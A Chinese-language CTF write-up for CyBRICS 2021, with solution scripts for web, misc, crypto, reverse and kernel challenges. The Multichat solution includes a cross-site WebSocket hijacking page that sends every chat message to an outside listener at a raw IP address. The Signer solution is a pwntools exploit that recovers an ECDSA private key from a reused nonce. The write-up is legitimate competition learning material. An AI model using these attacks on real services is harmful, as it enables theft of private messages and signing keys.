CyBRICS 2021-WriteUp
Web
Ad Network
按题目要求跟随重定向 1337 次即可,起始 url 在页面左上角的动图里。requests 默认最多只跟随 30 次重定向(超过即抛 TooManyRedirects),因此要把 Session.max_redirects 调高到不少于 1337。
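import requests

# The challenge chains 1337 redirects; requests stops after
# Session.max_redirects hops (30 by default) and raises TooManyRedirects,
# so the budget is raised above that. allow_redirects is already True for GET.
a = requests.session()
a.max_redirects = 1338
# A bounded per-hop timeout keeps a stalled hop from hanging the script forever.
flag = a.get('http://adnetwork-cybrics2021.ctf.su/adnetwork', timeout=30)
print(flag.text)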
Multichat
根据题目描述,向有管理员和技术支持的私密房间内发送特定的字符串,管理员将会在私密房间内把 flag 发出来。
在题目中发现了能够提交url并让技术支持点击url的地方http://multichat-cybrics2021.ctf.su:5000/
修改原聊天室页面的 js 函数:页面加载后直接建立 websocket 连接并发送 Hey, i forgot the flag. Can you remind me?
,在收到聊天室消息后,再通过 http 请求把消息内容外带到自己的服务器。把改好的网页挂在自己的服务器上,技术支持一旦访问该页面,其浏览器就会以自己的身份建立 WebSocket 连接、向所在聊天室发送特定字符串,并把聊天室内容回传到我们的服务器(推测服务端未校验 WebSocket 握手的 Origin 且会话随 cookie 自动携带,即跨站 WebSocket 劫持;若服务端校验 Origin,此法不可行)。
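// Exfiltration variant of the chat page's connect(): as soon as the socket
// opens it sends the trigger phrase, and every message received is both
// appended to the page log and forwarded to the attacker-controlled listener.
function connect() {
    if (!window["WebSocket"]) {
        appendLog("Your browser does not support WebSockets.");
        return;
    }
    // Same endpoint as the original client. Presumably the victim's browser
    // attaches its own session cookie to the handshake, which is what lets
    // this page speak as the support user -- confirm against the server.
    conn = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
    conn.onclose = function (evt) {
        var item = "";
        if (evt.code === 1003) {
            item = `Status: ${evt.reason}`;
        } else {
            item = "Connection closed.";
        }
        appendLog(item);
    };
    conn.onopen = function (evt) {
        appendLog("Connected");
        conn.send("Hey, i forgot the flag. Can you remind me?");
    };
    conn.onmessage = function (evt) {
        appendLog(evt.data);
        // The original used an undeclared `request`; create one per message
        // and URL-encode the payload so '&', '#', '+' or spaces in a message
        // do not truncate or mangle what reaches the listener.
        var request = new XMLHttpRequest();
        request.open('GET', 'http://120.55.164.48:1234/?a=' + encodeURIComponent(evt.data), true);
        request.send();
    };
}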
// Page bootstrap: pick a random room id, open the socket, and wire the
// message form so that submitting sends the typed text over `conn`.
window.onload = function () {
    var roomId = getRandomInt(1000, 9999999999);
    var msgInput = document.getElementById("msg");
    var logArea = document.getElementById("log");
    connect();
    document.getElementById("form").onsubmit = function () {
        // Nothing to send without an open socket or without text.
        if (!conn || !msgInput.value) {
            return false;
        }
        conn.send(msgInput.value);
        sended_message = msgInput.value;
        msgInput.value = "";
        return false;
    };
    document.getElementById("room").value = roomId;
}
把 url 发给技术支持点击,然后查看自己服务器的访问日志即可拿到 flag(消息是直接拼进 URL 的查询串里的,若 flag 含特殊字符,请看完整的原始请求行)。
Misc
Scanner
游戏一共五关,最后一关得到一张二维码 gif,用 PS 处理后扫码得到:
cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}
CAPTCHA The Flag
使用 stegsolve 连续查看 25 张图中隐写的验证码,输入正确后即可获得 flag
cybrics{a_k33n_Ey3_wi11_sp0T_r1GhT_aw4Y}
Crypto
Signer
'''
@author: badmonkey
@software: PyCharm
@file: exp.py
@time: 2021/7/25 下午1:34
'''
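import ast
from hashlib import md5

from pwn import *
from ecdsa import ecdsa as ec
from Crypto.Util.number import *

ip = "109.233.61.10"
port = 10105
context.log_level = "debug"

# NIST P-192 generator; every nonce/key computation below is modulo its order.
g = ec.generator_192
N = g.order()


def get_signature(ip, port):
    """Ask the service for one signature (menu option 1) and return (r, s, h).

    The reply is a Python tuple literal produced by a remote host, so it is
    parsed with ast.literal_eval instead of eval(): literal_eval accepts
    literals only and can never execute code the server sends back.
    """
    sh = remote(ip, port)
    sh.recvuntil(">")
    sh.sendline("1")
    reply = sh.recvall().strip()
    sh.close()
    if isinstance(reply, bytes):
        reply = reply.decode()
    r, s, h = ast.literal_eval(reply)
    return int(r), int(s), int(h)


def recover_key_from_reused_nonce(r1, s1, h1, r2, s2, h2, N):
    """Return (k, x) from two ECDSA signatures made with the same nonce k.

    With s = k^-1 (h + r x) mod N and an identical k (hence identical r):
        s1 - s2 = k^-1 (h1 - h2)  =>  k = (h2 - h1) / (s2 - s1)
        x = (k s1 - h1) / r1
    Raises ValueError when r1 != r2 (the nonce was not reused, so the
    formulas would return garbage) or when s1 == s2 mod N (no inverse).
    """
    if r1 != r2:
        raise ValueError("r1 != r2: nonce was not reused, attack does not apply")
    if (s2 - s1) % N == 0:
        raise ValueError("s1 == s2 mod N: cannot invert s2 - s1")
    k = ((h2 - h1) * inverse((s2 - s1) % N, N)) % N
    x = (inverse(r1, N) * (k * s1 - h1)) % N
    return k, x


r1, s1, h1 = get_signature(ip, port)
r2, s2, h2 = get_signature(ip, port)
k, x = recover_key_from_reused_nonce(r1, s1, h1, r2, s2, h2, N)
pub = ec.Public_key(g, g * x)
pri = ec.Private_key(pub, x)

# Menu option 2: the service prints a line containing the string to sign;
# the slice isolates it (offsets are specific to this service's prompt).
sh = remote(ip, port)
sh.recvuntil(">")
sh.sendline("2")
payload = sh.recvline().strip()[-19:-2]
m = int(md5(payload).hexdigest(), 16)
# Any nonce works now that we hold x; a fixed one is fine for a one-off
# exploit but would leak the key again in real use.
sig = pri.sign(m, 2333)
sh.sendline("{},{}".format(sig.r, sig.s))
sh.interactive()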
Reverse
listing
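# Each of the four 8-byte words is recovered the same way: the stored bytes
# (a*) are permuted by the index table (b*), packed big-endian (first byte
# most significant) and XORed with one shared 64-bit key.
KEY = 0xb0b045130550cafe


def unscramble_qword(data, perm, mod=None):
    """Pack data[perm[i]] (or data[perm[i] % mod]) into a 64-bit int, first index most significant.

    data: 8 byte values (0..255).
    perm: 8 shuffle indices; the listing stores them offset by 8, 16 and 24
          for the second, third and fourth word, which `mod` strips again.
    mod:  modulus applied to each index, or None to use the index as is.
    """
    value = 0
    for p in perm:
        index = p if mod is None else p % mod
        value = (value << 8) | data[index]
    return value


a1 = [0xd1,0xd3,0x76,0x23,0x35,0x61,0x9a,0xab]
b1 = [0x01,0x00,0x03,0x02,0x05,0x04,0x07,0x06]
h1 = unscramble_qword(a1, b1)
print(hex(h1 ^ KEY))

a2 = [0xd5,0xd5,0x23,0x27,0x35,0x65,0x83,0xf8]
b2 = [0x09,0x08,0x0b,0x0a,0x0c,0x0d,0x0f,0x0e]
h2 = unscramble_qword(a2, b2, 0x8)
print(hex(h2 ^ KEY))

a3 = [0xc9,0xd3,0x61,0x27,0x33,0x6c,0x85,0xb9]
b3 = [0x11,0x10,0x13,0x12,0x15,0x14,0x17,0x16]
h3 = unscramble_qword(a3, b3, 0x10)
print(hex(h3 ^ KEY))

a4 = [0xd5,0xd6,0x22,0x71,0x31,0x61,0xcb,0xf8]
b4 = [0x19,0x18,0x1b,0x1a,0x1c,0x1d,0x1f,0x1e]
h4 = unscramble_qword(a4, b4, 0x18)
print(hex(h4 ^ KEY))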
#[rdi] = {h3,h4,h1,h2}
from typing import *
from Crypto.Util.number import long_to_bytes
# Presumably the value the binary compares against: the four 8-byte words
# a1..a4 from the script above, concatenated as one hex string.
result = 'd1d3762335619aabd5d52327356583f8c9d36127336c85b9d5d622713161cbf8'
# XOR key 0xb0b045130550cafe written byte-reversed and repeated for all 32 bytes.
k1 = 'feca50051345b0b0feca50051345b0b0feca50051345b0b0feca50051345b0b0'
# Byte-shuffle control bytes (b1..b4 concatenated); rev() inverts the shuffle.
k2 = '010003020504070609080b0a0c0d0f0e111013121514171619181b1a1c1d1f1e'
def bigtolittle(s):
    """Reverse the byte order of a hex string (two characters per byte).

    'cdab' -> 'abcd'. An odd-length trailing fragment is kept as a one-char
    chunk and moved to the front like any other chunk.
    """
    chunks = [s[pos:pos + 2] for pos in range(0, len(s), 2)]
    return ''.join(reversed(chunks))
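def rev(dest, src2):
    """Invert a 32-byte, two-lane byte shuffle and return the source as bits.

    dest: 64 hex chars, the shuffle's output.
    src2: 64 hex chars, the control bytes. For output position i the control
          byte's low nibble selects the source byte inside the same 16-byte
          lane; a set high bit means the output byte was zeroed and tells
          nothing about the source. (This matches SSE pshufb semantics --
          inferred from the listing, not verified here.)
    Returns a 256-character bit string of the recovered source; bytes that
    no output position refers to are rendered as '????????'.

    The previous version wrote '?' into a stale (or, for the very first
    byte, undefined) index when the high bit was set; such positions are
    now simply skipped.
    """
    dest_bin = bin(int(dest, 16))[2:].zfill(256)
    ctrl_bin = bin(int(src2, 16))[2:].zfill(256)
    src1 = ['?' * 8] * 32
    for lane in (0, 1):
        base = lane * 16
        lo, hi = lane * 128, (lane + 1) * 128
        ctrl_lane = ctrl_bin[lo:hi]
        dest_lane = dest_bin[lo:hi]
        for i in range(0, 128, 8):
            if ctrl_lane[i] == '1':
                continue  # output byte was zeroed: no information about the source
            idx = int(ctrl_lane[i + 4:i + 8], 2)
            src1[base + idx] = dest_lane[i:i + 8]
    return ''.join(src1)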
# The listing works on little-endian memory, so every constant is
# byte-reversed first; then the shuffle is undone and the XOR key removed.
result, k1, k2 = map(bigtolittle, (result, k1, k2))
src1 = rev(result, k2)
print(src1)
rdi = int(k1, 16) ^ int(src1, 2)
print(long_to_bytes(rdi))
kernel
ssh 连接上去后把相关文件 dump 下来分析,发现只要传入 ioctl 的值满足与当前时间(秒)的异或关系即可。
猜测文件位于对应 dev 目录下,构建代码如下:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
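/*
 * Ask the challenge driver for the flag.
 *
 * The driver is assumed to live at /dev/ioctl (the write-up guesses the
 * path). The buffer handed to ioctl 0x5702 carries, in its first 4 bytes,
 * 0x13373389 XORed with the current Unix time in seconds; the same buffer
 * is then printed as a C string. Presumably the driver checks the value
 * against its own notion of the current second -- verify against the module.
 */
int main(void)
{
    char s[100] = {0};
    unsigned int val = 0x13373389;
    unsigned int token;
    struct timeval begin;

    int fd = open("/dev/ioctl", O_RDWR);
    if (fd < 0) {
        perror("open /dev/ioctl");
        return EXIT_FAILURE;
    }

    /* Taken right before the ioctl so the second does not roll over. */
    gettimeofday(&begin, NULL);
    token = val ^ (unsigned int)begin.tv_sec;
    /* memcpy instead of a type-punned store: s is not guaranteed aligned. */
    memcpy(s, &token, sizeof token);

    if (ioctl(fd, 0x5702, s) < 0) {
        perror("ioctl 0x5702");
        close(fd);
        return EXIT_FAILURE;
    }
    close(fd);

    /* The driver's write length is unknown: force termination before puts. */
    s[sizeof(s) - 1] = '\0';
    puts(s);
    return EXIT_SUCCESS;
}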
编译为 elf 文件(建议加 -static 静态链接,避免目标机缺少运行库),再通过 ssh 传到目标机上执行,即可获取 flag。
end